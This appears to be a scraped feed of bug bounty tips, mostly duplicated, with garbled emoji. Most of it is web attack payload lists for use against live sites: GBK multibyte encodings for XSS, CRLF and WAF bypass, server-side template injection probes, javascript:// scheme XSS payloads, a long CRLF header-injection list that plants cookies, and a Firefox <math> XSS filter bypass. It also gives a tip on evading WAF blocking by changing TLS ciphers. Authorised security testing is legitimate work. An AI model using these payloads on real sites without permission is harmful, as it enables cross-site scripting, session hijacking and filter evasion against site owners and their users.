Burp Suite 2023.8+ includes a feature that theoretically makes opening untrusted project files safe. If you find a bypass, you're probably eligible for a bounty - check the full details here:
https://portswigger.net/burp/releases/professional-community-2023-8
https://portswigger.net/burp/releases/professional-community-2023-8
Burp Suite Release Notes
Professional / Community 2023.8
This release introduces the ability to reuse HTTP/1 connections in Intruder, specify intermediate CA certificates when authenticating using hardware tokens and smart cards, safely open third-party pro
Bug Bounty Tip
GBK Encoding / MultiByte Attack
ε = %E5%98%8A = \u560a β %0A
ε = %E5%98%8D = \u560d β %0D
εΎ = %E5%98%BE = \u563e β %3E (>)
εΌ = %E5%98%BC = \u563c β %3C (<)
ε’ = %E5%98%A2 = \u5622 β %22 (')
ε§ = %E5%98%A7 = \u5627 β %27 (")
For XSS, CRLF, WAF bypass
GBK Encoding / MultiByte Attack
ε = %E5%98%8A = \u560a β %0A
ε = %E5%98%8D = \u560d β %0D
εΎ = %E5%98%BE = \u563e β %3E (>)
εΌ = %E5%98%BC = \u563c β %3C (<)
ε’ = %E5%98%A2 = \u5622 β %22 (')
ε§ = %E5%98%A7 = \u5627 β %27 (")
For XSS, CRLF, WAF bypass
https://portswigger.net/burp/documentation/desktop/settings/network/tls#tls-negotiation
Burp Suite 2023.10 is harder to fingerprint than earlier versions as it now sets 'Accept-Encoding: gzip, deflate, br'. If you're still blocked, you might bypass it by tinkering with your TLS ciphers using "Network->TLS -> Use custom protocols and ciphers"
Burp Suite 2023.10 is harder to fingerprint than earlier versions as it now sets 'Accept-Encoding: gzip, deflate, br'. If you're still blocked, you might bypass it by tinkering with your TLS ciphers using "Network->TLS -> Use custom protocols and ciphers"
portswigger.net
TLS settings
The TLS settings enable you to configure: TLS negotiation. Client TLS certificates. Server TLS certificates. Java TLS settings. TLS negotiation These ...
Bug Bounty Tip
SSTI (Server Side Template Injection) Payload List
πΉ{7*7}
πΉ*{7*7}
πΉ{{7*7}}
πΉ[[7*7]]
πΉ${7*7}
πΉ@(7*7)
πΉ<?=7*7?>
πΉ<%= 7*7 %>
πΉ${= 7*7}
πΉ{{= 7*7}}
πΉ${{7*7}}
πΉ#{7*7}
πΉ[=7*7]
If evaluated as 49 - the target is vulnerable
SSTI (Server Side Template Injection) Payload List
πΉ{7*7}
πΉ*{7*7}
πΉ{{7*7}}
πΉ[[7*7]]
πΉ${7*7}
πΉ@(7*7)
πΉ<?=7*7?>
πΉ<%= 7*7 %>
πΉ${= 7*7}
πΉ{{= 7*7}}
πΉ${{7*7}}
πΉ#{7*7}
πΉ[=7*7]
If evaluated as 49 - the target is vulnerable
Bug Bounty Tip
When the app only accepts URLs
with a specific scheme, try
injecting javascript://test.com
Then, use these symbols
to craft an XSS payload
πΉ%0a
πΉ%0d
πΉ%E2%80%A8
πΉ%E2%80%A9
β javascript://test.com%0aalert(1)
When the app only accepts URLs
with a specific scheme, try
injecting javascript://test.com
Then, use these symbols
to craft an XSS payload
πΉ%0a
πΉ%0d
πΉ%E2%80%A8
πΉ%E2%80%A9
β javascript://test.com%0aalert(1)
CRLF Payload List
πΉ /%%0a0aSet-Cookie:crlf
πΉ /%0aSet-Cookie:crlf
πΉ /%0d%0aSet-Cookie:crlf
πΉ /%0dSet-Cookie:crlf
πΉ /%23%0aSet-Cookie:crlf
πΉ /%23%0d%0aSet-Cookie:crlf
πΉ /%23%0dSet-Cookie:crlf
πΉ /%25%30%61Set-Cookie:crlf
πΉ /%25%30aSet-Cookie:crlf
πΉ /%250aSet-Cookie:crlf
πΉ /%25250aSet-Cookie:crlf
πΉ /%2e%2e%2f%0d%0aSet-Cookie:crlf
πΉ /%2f%2e%2e%0d%0aSet-Cookie:crlf
πΉ /%2F..%0d%0aSet-Cookie:crlf
πΉ /%3f%0d%0aSet-Cookie:crlf
πΉ /%3f%0dSet-Cookie:crlf
πΉ /%u000aSet-Cookie:crlf
πΉ /%E5%98%8D%E5%98%8ASet-Cookie:crlf
πΉ /%%0a0aSet-Cookie:crlf
πΉ /%0aSet-Cookie:crlf
πΉ /%0d%0aSet-Cookie:crlf
πΉ /%0dSet-Cookie:crlf
πΉ /%23%0aSet-Cookie:crlf
πΉ /%23%0d%0aSet-Cookie:crlf
πΉ /%23%0dSet-Cookie:crlf
πΉ /%25%30%61Set-Cookie:crlf
πΉ /%25%30aSet-Cookie:crlf
πΉ /%250aSet-Cookie:crlf
πΉ /%25250aSet-Cookie:crlf
πΉ /%2e%2e%2f%0d%0aSet-Cookie:crlf
πΉ /%2f%2e%2e%0d%0aSet-Cookie:crlf
πΉ /%2F..%0d%0aSet-Cookie:crlf
πΉ /%3f%0d%0aSet-Cookie:crlf
πΉ /%3f%0dSet-Cookie:crlf
πΉ /%u000aSet-Cookie:crlf
πΉ /%E5%98%8D%E5%98%8ASet-Cookie:crlf
Bug Bounty Reminder
Don't forget about the <math> element for XSS WAF bypass on Firefox browser.
<math>
<xss href="javascript:alert(31337)">
Click Me
</xss>
</math>
The <math> can make any HTML element clickable within it.
Don't forget about the <math> element for XSS WAF bypass on Firefox browser.
<math>
<xss href="javascript:alert(31337)">
Click Me
</xss>
</math>
The <math> can make any HTML element clickable within it.
Mindmap/Nmap/nmap UHD.png at main Β· Ignitetechnologies/Mindmap Β· GitHub
https://github.com/Ignitetechnologies/Mindmap/blob/main/Nmap/nmap%20UHD.png
https://github.com/Ignitetechnologies/Mindmap/blob/main/Nmap/nmap%20UHD.png
GitHub
Mindmap/Nmap/nmap UHD.png at main Β· Ignitetechnologies/Mindmap
This repository will contain many mindmaps for cyber security technologies, methodologies, courses, and certifications in a tree structure to give brief details about them - Ignitetechnologies/Mindmap
Mindmap/Red Team Dorks at main Β· Ignitetechnologies/Mindmap Β· GitHub
https://github.com/Ignitetechnologies/Mindmap/tree/main/Red%20Team%20Dorks
https://github.com/Ignitetechnologies/Mindmap/tree/main/Red%20Team%20Dorks
GitHub
Mindmap/Red Team Dorks at main Β· Ignitetechnologies/Mindmap
This repository will contain many mindmaps for cyber security technologies, methodologies, courses, and certifications in a tree structure to give brief details about them - Ignitetechnologies/Mindmap